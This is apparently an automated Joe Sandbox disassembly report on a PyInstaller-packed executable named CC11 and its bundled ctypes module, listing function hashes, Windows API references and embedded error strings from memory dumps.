                                                                                                                                                                  • Instruction ID: 3e4ab3a65dd899695cc4e478583a6cad7a04189b68bf038cc4523808741369ea
                                                                                                                                                                  • Opcode Fuzzy Hash: e1901c3f67c9cc1b02f91d214b5f4b6f328cd1706827d80eeb8e9729a1f67c59
                                                                                                                                                                  • Instruction Fuzzy Hash: 19414C31E0AB4381EE589FAEED441B97BA0AF85BD4F284135CB5E467A5EF2CE444C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                  • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                  • Instruction ID: 7b7fc0d14f23e5e8cbccf311bdbe500c2db0c24baa8cb43b77b5408f9667c13a
                                                                                                                                                                  • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                  • Instruction Fuzzy Hash: 85D18032A08781A6EBB09B75D4403AD7BA4FB5978CF100176EE4D97B9ADF38E491C740
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017CE4
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017D2C
                                                                                                                                                                    • Part of subcall function 00007FF690017E10: GetEnvironmentVariableW.KERNEL32(00007FF69001365F), ref: 00007FF690017E47
                                                                                                                                                                    • Part of subcall function 00007FF690017E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF690017E69
                                                                                                                                                                    • Part of subcall function 00007FF690027548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690027561
                                                                                                                                                                    • Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                  • API String ID: 740614611-1339014028
                                                                                                                                                                  • Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                                                                                                  • Instruction ID: 582e2f5395253aec387d1e83e57f5de326240f7cfe8f1735a6deca2948ca138d
                                                                                                                                                                  • Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                                                                                                                                  • Instruction Fuzzy Hash: 9141A511B09A4660FAB1EB75A9556F92361EF897C8F8000B1EE1DC77DEEE3CE5818340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Arg_FormatNumber_OccurredSsize_tSubtypeTupleType_Unpack
                                                                                                                                                                  • String ID: byref$byref() argument must be a ctypes instance, not '%s'
                                                                                                                                                                  • API String ID: 3717719007-1446499295
                                                                                                                                                                  • Opcode ID: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
                                                                                                                                                                  • Instruction ID: 16d43837195dacf5edf2a0d808a9880089ed45eeb75a51817458e60444b7074c
                                                                                                                                                                  • Opcode Fuzzy Hash: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A213426A09A4681EB00CBA9E8506B877A0FF88BE4F044636CB6E87791DF7DE554C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SubtypeType_$Err_FormatUnicode_strchr
                                                                                                                                                                  • String ID: 'out' parameter %d must be a pointer type, not %s$PzZ
                                                                                                                                                                  • API String ID: 3227297879-2360062653
                                                                                                                                                                  • Opcode ID: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
                                                                                                                                                                  • Instruction ID: 043a6a045711c4e389593e92973763f62059c7bfa9f88de0d5bf61eebb494014
                                                                                                                                                                  • Opcode Fuzzy Hash: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
                                                                                                                                                                  • Instruction Fuzzy Hash: 94212925B09A46D5EB149F99E44127827A1FFC4FC8F088031DF4E873AADE2CE885C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SubtypeType_$Err_FormatUnicode_strchr
                                                                                                                                                                  • String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
                                                                                                                                                                  • API String ID: 3227297879-1038790478
                                                                                                                                                                  • Opcode ID: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
                                                                                                                                                                  • Instruction ID: 5963908313302226d692856038e902f4be350d0e05f486ff6b0442196b1be6a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F2121A5B0964792EF549F9DD4503B82760EF94FC5F68403ACB4D47261DF2CE984C350
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeallocErr_$CharFormatStringUnicode_Wide
                                                                                                                                                                  • String ID: one character unicode string expected$unicode string expected instead of %s instance
                                                                                                                                                                  • API String ID: 3624372013-2255738861
                                                                                                                                                                  • Opcode ID: 78dfc2eb6af70e9ff56f0b870839ae75e7c80da9051f64390c1f4690cb9272f4
                                                                                                                                                                  • Instruction ID: 3337bd6fea6e253b1a1bcc8fe6869907a73378189b8b11ca215b042f90d16ddb
                                                                                                                                                                  • Opcode Fuzzy Hash: 78dfc2eb6af70e9ff56f0b870839ae75e7c80da9051f64390c1f4690cb9272f4
                                                                                                                                                                  • Instruction Fuzzy Hash: 5511E675A19B4AC1EB449FAEE8541B82360FBC9BE4F549032DB4E4776ADE2DD488C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Arg_CharErrorFreeFromLastLocalParseTupleUnicode_Wide
                                                                                                                                                                  • String ID: <no description>$|i:FormatError
                                                                                                                                                                  • API String ID: 935104296-1632374824
                                                                                                                                                                  • Opcode ID: 76526e8ca7a5dbad8a9db4044e1930993c468c73b951a0b1ccb6cf4ff79fcccc
                                                                                                                                                                  • Instruction ID: 9efa05082639b16bdb73f5359a727570e67ec3d0973e45f3d83b6abe6842b5b1
                                                                                                                                                                  • Opcode Fuzzy Hash: 76526e8ca7a5dbad8a9db4044e1930993c468c73b951a0b1ccb6cf4ff79fcccc
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C018061B0D64282EB159BADE8040B927A1FF88BE0F154231DB6E836D5EF3CE444C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Eval_Thread$Arg_Err_FreeFromLibraryParseRestoreSaveTupleWindows
                                                                                                                                                                  • String ID: O&:FreeLibrary
                                                                                                                                                                  • API String ID: 204461231-2600264430
                                                                                                                                                                  • Opcode ID: 75aac2151fbe6049cb3e9a760563f3d4315885d4bc3b29649270f1793fab5e9a
                                                                                                                                                                  • Instruction ID: e16a0167d20c4bba0552a99a9c3050a3c9969e1644bdd3303f9688f303e8d0d0
                                                                                                                                                                  • Opcode Fuzzy Hash: 75aac2151fbe6049cb3e9a760563f3d4315885d4bc3b29649270f1793fab5e9a
                                                                                                                                                                  • Instruction Fuzzy Hash: C901D325A1DA4782EB548BEAEC401792760FF88BC0F544032DB4E53766DE3CE849C701
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$FreeMem_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2019857417-0
                                                                                                                                                                  • Opcode ID: 374871c9eff3e112a1b206d9784e4eccbf1f957899ebfee0265df15c18715757
                                                                                                                                                                  • Instruction ID: 59a1f547c7d16417148c5af4b4f10bb130bfefccc975963ca5939abf66d60fde
                                                                                                                                                                  • Opcode Fuzzy Hash: 374871c9eff3e112a1b206d9784e4eccbf1f957899ebfee0265df15c18715757
                                                                                                                                                                  • Instruction Fuzzy Hash: A531EA32A0AA42C5EB989FEAD8543BC37A4FB95FDAF244030CB4E46255DF3CA545D314
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallDeallocErr_ObjectObject_StringSubtypeType_
                                                                                                                                                                  • String ID: has no _stginfo_
                                                                                                                                                                  • API String ID: 1588466501-2912685656
                                                                                                                                                                  • Opcode ID: 5c1c4e8e87691ef5d94af4ab4c7f18db9f774f61d349d2447f707128ae63115f
                                                                                                                                                                  • Instruction ID: c10592551516eb0a6ec03e3e7964cac71ea8a008dd2ae1a07eef7f41358267c9
                                                                                                                                                                  • Opcode Fuzzy Hash: 5c1c4e8e87691ef5d94af4ab4c7f18db9f774f61d349d2447f707128ae63115f
                                                                                                                                                                  • Instruction Fuzzy Hash: D1B11D72B09B8285EB65CFAAE4502792BA4FB84BC4F184436DB4E47795DF3CE564C340
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D06D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D07B
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D0A5
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D113
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D11F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                  • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                  • Instruction ID: c14b94142e2d950d534a811ae49820a420fbbe260568b69c40cb5573b4195e73
                                                                                                                                                                  • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8531B421A1AA42A1EE77DB66A4007752395FF0CBA8F590576EE1D87388EF7CE4428700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$FormatInstanceObject_StringSubtypeType_
                                                                                                                                                                  • String ID: Pointer does not support item deletion$expected %s instead of %s
                                                                                                                                                                  • API String ID: 1243598503-2046472288
                                                                                                                                                                  • Opcode ID: 7e5abba99994391ff7d7e0f3205b13952e94d9d845f4bbb21d1d68935d99630f
                                                                                                                                                                  • Instruction ID: 1501d2ce5df08537291a0e22cf6f5ced026b06e656f38cd4acd607e89cd65e21
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e5abba99994391ff7d7e0f3205b13952e94d9d845f4bbb21d1d68935d99630f
                                                                                                                                                                  • Instruction Fuzzy Hash: 23215161A09B4285EB449FAAD8400BA6765FF89FD8B148532DF1E577A6DF3CE485C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                  • Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                  • Instruction ID: caaba141d6650ae7dd261c3e276eb61553160e369f13a72dacd188c2a5324921
                                                                                                                                                                  • Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D217631A0CA4291EB709B75E48463AA3A1FFC57A8F500275EA6D83BDDDF7CD4858740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                  • Instruction ID: 19388cbea8efa2374654c0aacefefa60c5212b1b5965c82967659b45a91bd2f7
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 73215E20B4C682A2FA78A339565957D6182EF897B0F1447B4E93EC7BDEDE6CF4024701
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ErrorFormatLast
                                                                                                                                                                  • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                  • API String ID: 3971115935-1149178304
                                                                                                                                                                  • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                  • Instruction ID: f7e6f0c8486276df5c64299267a43f10cd3c0e44f38c4daa40fc890f1ce665e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 34212172618A85A2E7319B20F4506EA7365FB88788F400136EBCD93B9CDF7CD5468B40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CharErr_FormatUnicode_Wide
                                                                                                                                                                  • String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
                                                                                                                                                                  • API String ID: 2195588020-2061977717
                                                                                                                                                                  • Opcode ID: 7ac85017326a6a3638da0ed184420ce377bd8bc92a60fdcc85f64a8ab54a6b3d
                                                                                                                                                                  • Instruction ID: c5fc009ec3f548c3894bbedc78328e5d77fd89fea6a8d2f9512da8bfb854b9a9
